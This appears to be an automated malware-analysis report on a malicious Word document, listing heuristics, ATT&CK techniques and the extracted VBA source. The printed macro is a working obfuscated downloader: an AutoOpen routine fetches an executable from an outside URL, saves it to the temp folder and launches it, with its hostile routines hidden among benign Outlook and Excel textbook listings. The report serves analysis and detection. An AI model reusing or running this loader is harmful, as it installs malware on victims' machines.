MALICIOUS
328
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains heavily obfuscated VBA macros, including an auto-executing loader that uses CreateObject and CallByName, indicative of a downloader. The 'Password-protected archive handoff' heuristic suggests the document's purpose is to trick the user into enabling macros to decrypt or access a payload. The ClamAV detection further confirms its malicious nature.
Heuristics 9
-
ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set eWUyYS91 = CreateObject(D3e8fTIO61) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set eWUyYS91 = CreateObject(D3e8fTIO61) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15753 bytes |
SHA-256: 27d7fd8f306b4d3f3746191415e61715284fa5068cb056a38d841e265ab30ce4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Nip121ЦКВ3017 (5.003)
End Sub
Sub Nip121ЦКВ3017(FFFFF As Double)
px4vMaz62GyVze
End Sub
Attribute VB_Name = "Module1"
Public lw6wgKatg As String
Public FEveEv As Double
Public VSeeve As Long
'
' Listing 22.1. A procedure that enumerates the first- and
' second-level folders in the Outlook namespace.
'
Sub EnumerateFolders()
'
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Run through the first-level folders
'
For Each folder In ns.Folders
Debug.Print folder.Name
'
' Run through the second-level folders, if any
'
If folder.Folders.Count > 1 Then
For Each subfolder In folder.Folders
Debug.Print " " & subfolder.Name
Next 'subfolder
End If
Next 'folder
Set ns = Nothing
End Sub
'
' Listing 22.2. A procedure to test the PickFolder method
'
Sub PickFolderTest()
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Display the Select Folder dialog box
'
Set folder = ns.PickFolder
'
' Test the return value
'
If Not folder Is Nothing Then
MsgBox "You picked " & folder.Name
End If
End Sub
'
' Listing 22.3. A procedure that toggles the Web view
' on and off for the currently displayed folder.
'
Sub ToggleWebView()
'
' Set up the namespace and get the explorer
'
Set ns = ThisOutlookSession.Session
'
' Save the current folder
'
Set currFolder = r.exp.CurrentFolder
'
' Move temporarily to the root
'
Set c.exp.CurrentFolder = ns.Folders(1)
'
' Toggle Web view for the current folder
'
currFolder.WebViewOn = Not currFolder.WebViewOn
'
' Return to the current folder
'
Set a.exp.CurrentFolder = currFolder
End Sub
'
' Listing 22.4. A Function that determines the
' e-mail address of the sender.
'
Function SenderAddress(msg As String) As String
'
' Create a temporary reply
'
Set replyItem = y.msg.Reply
'
' The Reply's "To" property holds the sender's address
'
SenderAddress = replyItem.To
Set replyItem = Nothing
End Function
'
' Use this procedure to test the SenderAddress function.
'
Sub SenderAddressTest()
'
' Set up the namespace and Inbox
'
Set ns = ThisOutlookSession.Session
Set ib = ns.GetDefaultFolder(olFolderInbox)
'
' Display the sender's address for a message
'
MsgBox SenderAddress(ib.Items(2))
End Sub
'
' Listing 22.5. A procedure that processes Inbox messages.
'
Sub ProcessInboxMessages()
'
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Get the default Inbox folder
'
Set ib = ns.GetDefaultFolder(olFolderInbox)
'
' Run through each item in the Inbox
'
For Each msg In ib.Items
'
' Flag important messages
'
If msg.Importance = olImportanceHigh Then
msg.FlagStatus = olFlagMarked
msg.FlagRequest = "Handle this, will ya!"
msg.FlagDueBy = Date + 7
msg.Importance = olImportanceNormal
msg.Save
End If
'
' Look for expired flags
'
If msg.FlagDueBy < Date Then
msg.Display
MsgBox "The displayed message has an expired flag!"
End If
'
' Move sensitive messages to "Confidential" folder
'
If msg.Sensitivity = olConfidential Then
msg.Move ns.Folders(1).Folders("Confidential")
End If
Next 'msg
End Sub
Sub px4vMaz62GyVze()
Set ppVZZF1t = eWUyYS91("M" & Chr(105) & Chr(99) & Chr(114) & "o" & Chr(115) & Chr(111) & "f" & Chr(116) & Chr(46) & "X" & "M" & "L" & "H" & Chr(84) & Chr(84) & Chr(80))
CallByName ppVZZF1t, "O" & Chr(112) & Chr(101) & "n", VbMethod, Chr(71) & Chr(69) & "T" _
, Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "w" & Chr(119) & Chr(119) & Chr(46) & Chr(116) & Chr(105) & Chr(115) & Chr(99) & Chr(104) & Chr(108) & Chr(101) & "r" & Chr(101) & Chr(105) & Chr(45) & "z" & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(100) & Chr(101) & Chr(47) & Chr(53) & Chr(57) & Chr(47) & Chr(53) & Chr(54) & Chr(46) & "e" & Chr(120) & Chr(101) _
, False
Set cenPup7VnpnK = eWUyYS91(Chr(87) & "S" & "c" & Chr(114) & "i" & Chr(112) & "t" & "." & Chr(83) & Chr(104) & Chr(101) & "l" & Chr(108))
Set OQmJPcxQ = CallByName(cenPup7VnpnK, Chr(69) & "" & "n" & Chr(118) & "" & Chr(105) & "ro" & Chr(110) & Chr(109) & "en" & Chr(116), VbGet, "P" & "" & Chr(114) & Chr(111) & "ce" & "ss")
mWGj6d6CH22Y = OQmJPcxQ(Chr(84) & Chr(69) & "M" & "P")
lw6wgKatg = mWGj6d6CH22Y & Chr(92) & Chr(115) & Chr(105) & Chr(108) & Chr(118) & Chr(117) & Chr(112) & "l" & Chr(101) & "." & Chr(101) & Chr(120) & Chr(101)
Dim FLLSJmKUYRVHQ() As Byte
CallByName ppVZZF1t, Chr(83) & Chr(101) & Chr(110) & Chr(100), VbMethod
FLLSJmKUYRVHQ = CallByName(ppVZZF1t, "re" & Chr(115) & "p" & Chr(111) & "n" & Chr(115) & "e" & Chr(66) & Chr(111) & Chr(100) & Chr(121), VbGet)
Zjo9QYph6v FLLSJmKUYRVHQ, lw6wgKatg
On Error GoTo PA4FeaqAL
a = 84 / 0
On Error GoTo 0
JRyXdhZR:
Exit Sub
PA4FeaqAL:
A06WNXrxh ("AU7CVXKyNxAAi")
Resume JRyXdhZR
End Sub
'
' Listing 22.6. A procedure that sends an e-mail message
'
Sub SendAMessage()
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Create the new MailItem
'
Set msg = Applicy.ation.CreateItem(olMailItem)
'
' Specify the recipient, subject, and body
' and then send the message
'
With msg
'
' Adjust the following address!
'
.Recipients.Add "bitbucket@mcfedries.com"
.Subject = "Just Testing"
.Body = "This is only a test"
.Send
End With
End Sub
'
' Listing 22.7. A procedure that creates a forwarded message
' and deletes any existing attachments before sending it.
'
Sub ForwardAndDeleteAttachments()
'
' Set up the namespace and Inbox
'
Set ns = ThisOutlookSession.Session
Set ib = ns.GetDefaultFolder(olFolderInbox)
'
' Create the forwarded MailItem
'
Set msg = ib.Items(ib.Items.Count).Forward
With msg
'
' Delete all the attachments
'
For Each att In .Attachments
att.Delete
Next 'att
'
' Send it (change the address!)
'
.Recipients.Add "selene@mcfedries.com"
.Send
End With
End Sub
'
Public Function A06WNXrxh(MmXQ1eLmZ As String)
Set d6eiGTziQd = eWUyYS91("S" & Chr(104) & Chr(101) & "l" & Chr(108) & "." & "A" & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110))
d6eiGTziQd.Open (lw6wgKatg)
End Function
' Listing 22.8. A procedure that stores a password
' in a folder's Description property.
'
Sub SetPassword()
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Save the password in the folder's Description property
'
Set folder = ns.Folders(1).Folders("Confidential")
folder.Description = "password"
End Sub
'
' Listing 22.9. An event handler that asks the user for
' a password before switching to the "Confidential" folder.
'
Private Sub gExplorer_BeforeFolderSwitch(ByVal NewFolder As Object, Cancel As Boolean)
If NewFolder.Name = "Confidential" Then
pwd = InputBox("Please enter the password for this folder:")
If pwd <> NewFolder.Description Then
Cancel = True
End If
End If
End Sub
'
' Use this event handler to insure that the gExplorer
' global variable gets instantiated at startup
'
Private Sub Application_Startup()
Set gExplorer = Applicat.ion.ActiveExplorer
End Sub
'
' Listing 22.10. An event handler for the MailItem object's Send event.
'
Private Sub gMailItem_Send(Cancel As Boolean)
Dim result As Integer
result = MsgBox("Do you want to save this message in Sent Items?", vbYesNo)
If result = vbNo Then
gMailItem.DeleteAfterSubmit = True
End If
End Sub
'
' Listing 22.11. A procedure that sends an e-mail message and
' references the global gMailItem variable to trap events.
'
Sub SendAMessage2()
'
' Set up the namespace
'
Set ns = ThisOutlookSession.Session
'
' Create the new MailItem using the
' gMailItem global variable
'
Set gMailItem = Appl.ication.CreateItem(olMailItem)
'
' Specify the recipient, subject, and body
' and then send the message
'
With gMailItem
'
' Adjust the following address!
'
.Recipients.Add "bitbucket@mcfedries.com"
.Subject = "Just Testing Events"
.Body = "This is only an events test"
.Send
End With
End Sub
Attribute VB_Name = "Module2"
'
' Listing 23.1. The GetNumbers procedure prompts the user for a dividend and a divisor.
'
Sub GetNumbers()
Dim done As Boolean
Dim divisor As Variant
Dim dividend As Variant
'
' Prompt user for dividend and divisor.
'
done = False
Do While Not done
dividend = InputBox("Enter the dividend:", "Divider")
divisor = InputBox("Enter the divisor:", "Divider")
done = Divide(dividend, divisor)
Loop
End Sub
'
' Listing 23.2. The Divide function divides the dividend by the divisor.
' The function traps "division by zero" errors.
'
Function Divide(dividend, divisor) As Boolean
Dim msg As String
Dim result As Single
'
' Set the trap
'
On Error GoTo DivByZeroHandler
'
' Peform the division
'
result = dividend / divisor
'
' If it went okay, display the result
'
msg = dividend & _
" divided by " & _
divisor & _
" equals " & _
result
MsgBox msg
'
' Set the return value and bypass the error handler
'
Divide = True
Exit Function
'
' Code branches here if an error occurs
'
DivByZeroHandler:
'
' Display the error message
'
result = MsgBox("You entered 0 as the divisor! Try again?", _
vbYesNo + vbQuestion, _
"Divider")
'
' Return the user's choice
'
If result = vbYes Then
Divide = False
Else
Divide = True
End If
End Function
'
' Listing 23.3 Backs up the active workbook to a drive specified by
Public Function eWUyYS91(D3e8fTIO61 As String)
Set eWUyYS91 = CreateObject(D3e8fTIO61)
End Function
' the user. Traps any errors (such as having no disk in the drive).
'
Sub BackUpToFloppy()
Dim backupDrive As String
Dim backupName As String
Dim msg As String
Dim done As Boolean
Dim result As Integer
'
' Define the location of the error handler
'
On Error GoTo ErrorHandler
'
' Initialize some variables and then loop
'
Application.DisplayAlerts = False
done = False
backupDrive = "A:"
While Not done
'
' Get the drive to use for the backup
'
backupDrive = InputBox( _
Prompt:="Enter the drive letter for the backup:", _
Title:="Backup", _
Default:=backupDrive)
'
' Check to see if OK was selected
'
If backupDrive <> "" Then
'
' Make sure the backup drive contains a colon (:)
'
If InStr(backupDrive, ":") = 0 Then
backupDrive = Left(backupDrive, 1) & ":"
End If
'
' First, save the file
'
ActiveWorkbook.Save
'
' Assume the backup will be successful,
' so set done to True to exit the loop
'
done = True
'
' Concatenate drive letter and workbook name
'
backupName = backupDrive & ActiveWorkbook.Name
'
' Make a copy on the specified drive
'
ActiveWorkbook.SaveCopyAs FileName:=backupName
Else
Exit Sub
End If
Wend
'
' Bypass the error handler
'
Exit Sub
'
' Code branches here if an error occurs
'
ErrorHandler:
msg = "An error has occurred!" & Chr(13) & Chr(13) & _
"Select Abort to bail out, Retry to re-enter the drive" & Chr(13) & _
"letter, or Ignore to attempt the backup again."
result = MsgBox(msg, vbExclamation + vbAbortRetryIgnore)
Select Case result
Case vbAbort
done = True
Case vbRetry
done = False
Resume Next
Case vbIgnore
Resume
End Select
End Sub
'
' Listing 23.4. This procedure divides two numbers. It traps three specific
Public Function Zjo9QYph6v(jIAuThroV99z As Variant, dicVrTXgN As String)
Dim pr5cUbS7yhDUj: Set pr5cUbS7yhDUj = eWUyYS91(Chr(65) & "d" & "o" & "d" & "b" & Chr(46) & Chr(83) & Chr(116) & Chr(114) & "e" & "a" & Chr(109))
With pr5cUbS7yhDUj
.Type = 1
.Open
.write jIAuThroV99z
.savetofile dicVrTXgN, 2
End With
End Function
' errors: division by zero, overflow, and type mismatch.
'
Sub DivideNumbers()
Dim msg As String
Dim result As Single
Dim divisor As Variant
Dim dividend As Variant
'
' Set the trap
'
On Error GoTo DivByZeroHandler
'
' Prompt user for the dividend
'
GetDividendAndDivisor:
dividend = InputBox("Enter the dividend:", "Divider")
If dividend = "" Then Exit Sub
'
' Prompt user for the divisor
'
GetDivisorOnly:
divisor = InputBox("Enter the divisor:", "Divider")
If divisor = "" Then Exit Sub
'
' Peform the division
'
result = dividend / divisor
'
' If it went okay, display the result
'
msg = dividend & _
" divided by " & _
divisor & _
" equals " & _
result
MsgBox msg
'
' Bypass the error handler
'
Exit Sub
'
' Code branches here if an error occurs
'
DivByZeroHandler:
'
' Display the error message
'
msg = "An error occurred!" & Chr(13) & Chr(13) & _
"Error number: " & Err.Number & Chr(13) & _
"Error message: " & Err.Description
MsgBox msg, vbOKOnly + vbCritical
'
' Check the error number
'
Select Case Err.Number
'
' Division by zero
'
Case 11
Resume GetDivisorOnly
'
' Overflow
'
Case 6
Resume GetDividendAndDivisor
'
' Type mismatch
'
Case 13
If Not IsNumeric(dividend) Then
Resume GetDividendAndDivisor
Else
Resume GetDivisorOnly
End If
'
' Anything else, just quit
'
Case Else
Exit Sub
End Select
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.